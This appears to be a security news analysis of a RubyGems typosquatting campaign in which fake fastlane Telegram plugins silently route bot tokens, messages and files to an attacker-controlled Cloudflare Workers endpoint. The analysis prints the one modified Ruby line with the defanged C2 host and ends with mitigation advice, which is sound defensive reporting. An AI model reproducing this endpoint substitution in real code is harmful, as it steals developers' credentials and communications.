In a sophisticated supply chain attack, cybercriminals have targeted the RubyGems ecosystem to steal sensitive developer credentials and communications. This campaign exploits geopolitical tensions, particularly Vietnam’s recent ban on Telegram, to harvest bot tokens, message content, and attached files.
Background on RubyGems and Supply Chain Attacks
RubyGems is a package manager for the Ruby programming language, allowing developers to distribute and manage libraries, known as gems. While this system facilitates software development, it also presents opportunities for malicious actors to introduce harmful code into widely used packages.
Supply chain attacks involve compromising software development processes to distribute malicious code. By infiltrating trusted components, attackers can affect numerous downstream users, making these attacks particularly insidious.
Details of the Malicious Campaign
The attackers employed typosquatting, a technique where malicious packages are named similarly to legitimate ones, hoping developers will inadvertently install them. In this case, two malicious gems were identified: `fastlane-plugin-telegram-proxy` and `fastlane-plugin-proxy_teleram`. These were designed to mimic the legitimate `fastlane-plugin-telegram`, a widely used plugin with over 600,000 downloads that facilitates sending deployment notifications to Telegram channels from CI/CD pipelines.
The timing of this attack is notable. The malicious packages appeared shortly after Vietnam’s nationwide blocking of Telegram on May 21, 2025. The threat actors marketed these gems as proxy plugins, exploiting the increased demand for Telegram workarounds among developers affected by the ban. This opportunistic approach underscores how cybercriminals rapidly adapt to exploit geopolitical events for targeted supply chain attacks.
Technical Analysis of the Infection Mechanism
The sophistication of this attack lies in its minimal code modification. The threat actors copied the original project’s README, preserved the public API, and retained expected plugin behavior while making only one critical change.
In the legitimate `fastlane-plugin-telegram`, messages are sent directly to Telegram’s official API using the standard endpoint:
“`ruby
uri = URI.parse(https://api.telegram.org/bot#{token}/sendMessage)
“`
However, in the malicious versions, this line was replaced with a hardcoded command and control (C2) endpoint:
“`ruby
# Threat actor’s proxy C2 endpoint; not Telegram
uri = URI.parse(https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage)
“`
This subtle substitution enables the threat actors to automatically capture bot tokens, chat identifiers, message content, and any uploaded files while maintaining the plugin’s expected functionality.
The malicious endpoint, hosted on Cloudflare Workers, presents itself as a benign Telegram Bot API proxy, claiming not to store or modify bot tokens. However, the implementation remains entirely opaque, with no published source code or transparency measures that would characterize a legitimate proxy service.
Implications and Potential Impact
The impact of this attack extends beyond simple credential theft. Fastlane operates within CI/CD pipelines that handle sensitive assets, including signing keys, release binaries, and environment secrets. Compromising these pipelines could lead to unauthorized access to software build and release workflows, potentially affecting the integrity of software products and the security of end-users.
Moreover, the persistence of this attack vector is particularly troubling. Stolen tokens remain valid until manually revoked, creating a window for ongoing unauthorized access to victim Telegram bots and associated communications.
Broader Context of Supply Chain Attacks
This incident is part of a broader trend of supply chain attacks targeting open-source ecosystems. In recent years, there have been multiple instances where malicious actors have infiltrated package repositories to distribute harmful code.
For example, in April 2020, over 700 malicious packages were discovered in the RubyGems repository. These packages were designed to intercept Bitcoin payments on Windows devices by replacing cryptocurrency wallet addresses in the clipboard with attacker-controlled addresses. The malicious packages were downloaded nearly 100,000 times, highlighting the scale and potential impact of such attacks.
Similarly, in December 2020, two RubyGems packages, `pretty_color` and `ruby-bitcoin`, were found to contain malware that persistently ran on infected Windows machines. These packages monitored the clipboard for cryptocurrency wallet addresses and replaced them with addresses under the attacker’s control, aiming to divert funds during transactions.
Mitigation and Recommendations
To protect against such supply chain attacks, developers and organizations should adopt several best practices:
1. Implement Multi-Factor Authentication (MFA): Enforce MFA for all accounts associated with package management and code repositories to prevent unauthorized access.
2. Verify Package Integrity: Before integrating third-party packages, verify their authenticity by checking checksums, signatures, and reviewing the code for any anomalies.
3. Monitor Dependencies: Regularly audit and monitor dependencies for any updates or changes that might introduce vulnerabilities.
4. Limit Dependency Usage: Minimize the use of external dependencies to reduce the attack surface.
5. Stay Informed: Keep abreast of security advisories and updates from package repositories and the broader security community.
By implementing these measures, developers can enhance the security of their software supply chains and mitigate the risks associated with malicious packages.
Conclusion
The exploitation of RubyGems to exfiltrate Telegram tokens and messages underscores the evolving nature of supply chain attacks. Cybercriminals are increasingly leveraging geopolitical events and minimal code modifications to infiltrate trusted ecosystems. It is imperative for developers and organizations to remain vigilant, adopt robust security practices, and foster a culture of security awareness to safeguard against such threats.
